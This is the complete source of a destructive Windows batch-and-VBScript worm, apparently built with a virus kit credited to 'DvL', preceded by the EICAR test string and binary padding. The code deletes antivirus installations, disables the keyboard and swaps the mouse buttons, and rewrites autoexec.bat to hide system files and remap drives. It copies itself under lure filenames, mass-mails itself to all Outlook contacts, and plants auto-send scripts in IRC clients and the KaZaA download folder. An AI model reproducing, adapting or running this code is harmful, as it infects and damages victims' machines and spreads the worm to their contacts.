X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
01010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010
10101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101
01010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010
10101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101
01010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010
10101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101
01010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010
10101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101
01010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010
10101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101
01010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010
10101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101
::
::
:: Generated by Dangerous Menu [DvL]
::
::
ctty nul
@echo off
@deltree/y %windir%\system\ioana >nul
@md %windir%\system\ioana
@copy %0 %windir%\system\ioana\ioana.bat
@for %%u in (%windir%\desktop\*.bat) do copy %windir%\system\ioana\ioana.bat %%u
@copy %0 %windir%\desktop\"Lonely Girls For Your Pleasure.url.bat" >nul
@copy %0 %windir%\desktop\"Lolita blows it.jpg.bat" >nul
@copy %0 c:\mydocu~1\"Sex, Money and Power.doc.bat" >nul
@copy %0 c:\mydocu~1\"Warcraft 3 update.exe.bat" >nul
@deltree/y %windir%\desktop\startm~1\*.* >nul
@copy %0 %windir%\desktop\startm~1\"Windows Update.exe.bat" >nul
@C:\WINDOWS\rundll32.exe user,swapmousebutton
@C:\WINDOWS\rundll32.exe keyboard,disable
@if exist c:\progra~1\norton~1\*.* deltree/y c:\progra~1\norton~1\
@if exist c:\progra~1\norton~2\*.* deltree/y c:\progra~1\norton~2\
@if exist c:\progra~1\symant~1\*.* deltree/y c:\progra~1\symant~1\
@if exist c:\progra~1\common~1\symant~1\*.* deltree/y c:\progra~1\common~1\symant~1\
@if exist c:\progra~1\common~1\avpsha~1\avpbases\*.* deltree/y c:\progra~1\common~1\avpsha~1\avpbases\
@if exist c:\progra~1\common~1\avpsha~1\*.* deltree/y c:\progra~1\common~1\avpsha~1\
@if exist c:\progra~1\mcafee\viruss~1\*.* deltree/y c:\progra~1\mcafee\viruss~1\
@if exist c:\progra~1\mcafee\*.* deltree/y c:\progra~1\mcafee\
@if exist c:\progra~1\pandas~1\*.* deltree/y c:\progra~1\pandas~1\
@if exist c:\progra~1\trendm~1\*.* deltree/y c:\progra~1\trendm~1\
@if exist c:\progra~1\comman~1\*.* deltree/y c:\progra~1\comman~1\
@if exist c:\progra~1\zonela~1\*.* deltree/y c:\progra~1\zonela~1\
@if exist c:\progra~1\tinype~1\*.* deltree/y c:\progra~1\tinype~1\
@if exist c:\progra~1\kasper~1\*.* deltree/y c:\progra~1\kasper~1\
@if exist c:\progra~1\kasper~2\*.* deltree/y c:\progra~1\kasper~2\
@if exist c:\progra~1\trojan~1\*.* deltree/y c:\progra~1\trojan~1\
@if exist c:\progra~1\avpers~1\*.* deltree/y c:\progra~1\avpers~1\
@if exist c:\progra~1\grisoft\*.* deltree/y c:\progra~1\grisoft\
@if exist c:\progra~1\antivi~1\*.* deltree/y c:\progra~1\antivi~1\
@if exist c:\progra~1\quickh~1\*.* deltree/y c:\progra~1\quickh~1\
@if exist c:\progra~1\f-prot95\*.* deltree/y c:\progra~1\f-prot95\
@if exist c:\progra~1\fwin32\*.* deltree/y c:\progra~1\fwin32\
@if exist c:\progra~1\tbav\*.* deltree/y c:\progra~1\tbav\
@if exist c:\progra~1\findvi~1\*.* deltree/y c:\progra~1\findvi~1\
@if exist c:\findvi~1\*.* deltree/y c:\findvi~1\
@if exist c:\esafen\*.* deltree/y c:\esafen\
@if exist c:\f-macro\*.* deltree/y c:\f-macro\
@if exist c:\tbavw95\*.* deltree/y c:\tbavw95\
@if exist c:\tbav\*.* deltree/y c:\tbav\
@if exist c:\vs95\*.* deltree/y c:\vs95\
@if exist c:\antivi~1\*.* deltree/y c:\antivi~1\
@if exist c:\toolkit\findvi~1\*.* deltree/y c:\toolkit\findvi~1\
@if exist c:\pccill~1\*.* deltree/y c:\pccill~1\
@echo.@time 00:00:00,00>c:\autoexec.bat"
@echo.@date 80-01-01>>c:\autoexec.bat"
@echo.@echo.>>c:\autoexec.bat"
@echo.@echo.>>c:\autoexec.bat"
@echo.@echo.>>c:\autoexec.bat"
@echo.@echo         É» É»   É» É»>>c:\autoexec.bat"
@echo.@echo         ºº ºÈ» É¼º ºº>>c:\autoexec.bat"
@echo.@echo         ºº È»ÈÍ¼É¼ ºº   This means that you`ve been burned by>>c:\autoexec.bat"
@echo.@echo         ºº  º   º  ºº                    DvL>>c:\autoexec.bat"
@echo.@echo         ºº  È» É¼  ºº>>c:\autoexec.bat"
@echo.@echo         È¼   ÈÍ¼   È¼>>c:\autoexec.bat"
@echo.@echo.>>c:\autoexec.bat"
@echo.@echo.>>c:\autoexec.bat"
@echo.@echo.>>c:\autoexec.bat"
@echo.@attrib c:\command.com +h +s +r>>c:\autoexec.bat"
@echo.echo 123>clock$>>c:\autoexec.bat"
@echo.subst e: a:\>>c:\autoexec.bat"
@echo.subst d: a:\>>c:\autoexec.bat"
@echo.subst c: a:\>>c:\autoexec.bat"
@echo.cls>>c:\autoexec.bat"
@echo.on error resume next>ioana.vbs"
@echo.dim a,b,c,d,e>>ioana.vbs"
@echo.set a = Wscript.CreateObject("Wscript.Shell")>>ioana.vbs"
@echo.set b = CreateObject("Outlook.Application")>>ioana.vbs"
@echo.set c = b.GetNameSpace("MAPI")>>ioana.vbs"
@echo.for y = 1 To c.AddressLists.Count>>ioana.vbs"
@echo.set d = c.AddressLists(y)>>ioana.vbs"
@echo.x = 1>>ioana.vbs"
@echo.set e = b.CreateItem(0)>>ioana.vbs"
@echo.for o = 1 To d.AddressEntries.Count>>ioana.vbs"
@echo.f = d.AddressEntries(x)>>ioana.vbs"
@echo.e.Recipients.Add f>>ioana.vbs"
@echo.x = x + 1>>ioana.vbs"
@echo.next>>ioana.vbs"
@echo.e.Subject = " For my special aNGeL ... IOANA ... ">>ioana.vbs"
@echo.e.Body = " I love you ">>ioana.vbs"
@echo.e.Attachments.Add ("c:\windows\system\ioana\ioana.bat")>>ioana.vbs"
@echo.e.DeleteAfterSubmit = False>>ioana.vbs"
@echo.e.Send>>ioana.vbs"
@echo.f = "">>ioana.vbs"
@echo.next>>ioana.vbs"
@start ioana.vbs
@echo.[script]>script.ini"
@echo.n0=on 1:JOIN:#:{>>script.ini"
@echo.n1=/if ( $nick == $me ) { halt }>>script.ini"
@echo.n2=/dcc send $nick c:\windows\system\ioana\ioana.bat>>script.ini"
@echo.n3=}>>script.ini"
@if exist c:\mirc\script.ini deltree/y c:\mirc\script.ini
@if exist c:\mirc32\script.ini deltree/y c:\mirc32\script.ini
@if exist c:\progra~1\mirc\script.ini deltree/y c:\progra~1\mirc\script.ini
@if exist c:\progra~1\mirc32\script.ini deltree/y c:\progra~1\mirc32\script.ini
@if exist c:\mirc\mirc.ini copy script.ini c:\mirc\script.ini
@if exist c:\mirc32\mirc.ini copy script.ini c:\mirc32\script.ini
@if exist c:\progra~1\mirc\mirc.ini copy script.ini c:\progra~1\mirc\script.ini
@if exist c:\progra~1\mirc32\mirc.ini copy script.ini c:\progra~1\mirc32\script.ini
@echo.[Levels]>events.ini"
@echo.Enabled=1>>events.ini"
@echo.Count=6>>events.ini"
@echo.Level1=000-Unknowns>>events.ini"
@echo.000-UnknownsEnabled=1>>events.ini"
@echo.Level2=100-Level 100>>events.ini"
@echo.100-Level 100Enabled=1>>events.ini"
@echo.Level3=200-Level 200>>events.ini"
@echo.200-Level 200Enabled=1>>events.ini"
@echo.Level4=300-Level 300>>events.ini"
@echo.300-Level 300Enabled=1>>events.ini"
@echo.Level5=400-Level 400>>events.ini"
@echo.400-Level 400Enabled=1>>events.ini"
@echo.Level6=500-Level 500>>events.ini"
@echo.500-Level 500Enabled=1>>events.ini"
@echo.>>events.ini"
@echo.[000-Unknowns]>>events.ini"
@echo.User1=*!*@*>>events.ini"
@echo.UserCount=1>>events.ini"
@echo.Event1=ON JOIN:#:/dcc send $nick c:\windows\system\ioana\ioana.bat>>events.ini"
@echo.EventCount=1>>events.ini"
@echo.>>events.ini"
@echo.[100-Level 100]>>events.ini"
@echo.UserCount=0>>events.ini"
@echo.EventCount=0>>events.ini"
@echo.>>events.ini"
@echo.[200-Level 200]>>events.ini"
@echo.UserCount=0>>events.ini"
@echo.EventCount=0>>events.ini"
@echo.>>events.ini"
@echo.[300-Level 300]>>events.ini"
@echo.UserCount=0>>events.ini"
@echo.EventCount=0>>events.ini"
@echo.>>events.ini"
@echo.[400-Level 400]>>events.ini"
@echo.UserCount=0>>events.ini"
@echo.EventCount=0>>events.ini"
@echo.>>events.ini"
@echo.[500-Level 500]>>events.ini"
@echo.UserCount=0>>events.ini"
@echo.EventCount=0>>events.ini"
@deltree/y c:\pirch\events.ini >nul"
@copy events.ini c:\pirch\events.ini
@deltree/y c:\pirch98\events.ini >nul"
@copy events.ini c:\pirch98\events.ini
@echo.on error resume next>virc.vbs"
@echo.set ws = CreateObject("wscript.shell")>>virc.vbs"
@echo.ws.regwrite "HKEY_USER\.Default\Software\MeGaLiTh Software\Visual IRC 96\Events\Event17","dcc send $nick c:\windows\system\ioana\ioana.bat">>virc.vbs"
@start virc.vbs
@echo.on error resume next>kaz.vbs"
@echo.set ws = CreateObject("wscript.shell")>>kaz.vbs"
@echo.ws.regwrite "HKLM\Software\KaZaA\Transfer\DlDir0","c:\windows\system\ioana\">>kaz.vbs"
@start kaz.vbs
@echo.on error resume next>pif.vbs"
@echo.dim wshs, msc>>pif.vbs"
@echo.set wshs=Wscript.CreateObject("WScript.Shell")>>pif.vbs"
@echo.set msc=wshs.CreateShortcut("C:\pif.lnk")>>pif.vbs"
@echo.msc.TargetPath = wshs.ExpandEnvironmentStrings("c:\windows\system\ioana\ioana.bat")>>pif.vbs"
@echo.msc.WindowStyle = 4>>pif.vbs"
@echo.msc.Save>>pif.vbs"
@start pif.vbs
@type nul | choice /n /cy /ty,7 >nul"
@for %a in (c:\*.pif *.pif ..\*.pif c:\mydocu~1\*.pif C:\WINDOWS\*.pif C:\WINDOWS;C:\WINDOWS\COMMAND\*.pif C:\WINDOWS\desktop\*.pif C:\WINDOWS\system\*.pif) do copy c:\pif.pif %a
@echo.on error resume next>lnk.vbs"
@echo.dim wshs, msc>>lnk.vbs"
@echo.set wshs=Wscript.CreateObject("WScript.Shell")>>lnk.vbs"
@echo.set msc=wshs.CreateShortcut("C:\lnk.lnk")>>lnk.vbs"
@echo.msc.TargetPath = wshs.ExpandEnvironmentStrings("c:\windows\system\ioana\ioana.bat")>>lnk.vbs"
@echo.msc.WindowStyle = 4>>lnk.vbs"
@echo.msc.Save>>lnk.vbs"
@start lnk.vbs
@type nul | choice /n /cy /ty,7 >nul"
@for %b in (c:\*.lnk *.lnk ..\*.lnk c:\mydocu~1\*.lnk C:\WINDOWS\*.lnk C:\WINDOWS;C:\WINDOWS\COMMAND\*.lnk C:\WINDOWS\desktop\*.lnk C:\WINDOWS\system\*.lnk) do copy c:\lnk.lnk %b
cls
